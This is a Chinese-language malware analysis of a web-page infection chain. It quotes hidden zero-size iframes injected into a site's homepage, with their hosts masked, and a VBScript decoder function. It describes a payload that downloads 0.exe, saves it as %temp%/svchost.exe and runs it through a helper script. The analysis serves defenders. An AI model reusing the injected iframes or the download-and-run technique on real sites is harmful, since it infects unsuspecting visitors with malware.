该网首页末被加入代码:
/--- <iframe src="hxxp://w**.q**b*b****d.com/b**d*.htm?001" width="0" height="0" frameborder="0"></iframe> <iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src=%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D width=0 height=0></iframe> ---/
hxxp://www.m*m***ju**.net/bbs/t***j*.htm 包含代码:
/--- <iframe src="hxxp://w.qbbd.com/bd.htm?001" width="0" height="0" frameborder="0"></iframe> ---/
hxxp://w**.q**b*b****d.com/b**d*.htm?001 包含代码:
/--- <iframe src="hxxp://w**.q**b*b****d.com/0.htm" width="0" height="0" frameborder="0"></iframe> ---/
hxxp://w**.q**b*b****d.com/0.htm (瑞星网页监控报为:Trojan.DL.VBS.Agent.clo)包含VBScript脚本代码,功能是用自定义函数:
function rechange(k) s=Split(k,",") t="" For i = 0 To UBound(s) t=t+Chr(eval(s(i))) Next rechange=t End Function
解密变量t的值并执行。
变量t解密后的值为VBScript脚本代码,功能是 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe,并创建内容为
/--- Set Shell = Shell.Application Shell.ShellExecute %temp%/svchost.exe "","","","open",0 ---/
的文件svchost.vbs,通过Shell.Application 对象 的 ShellExecute 方法 来运行svchost.vbs,从而让%temp%/svchost.exe得已运行。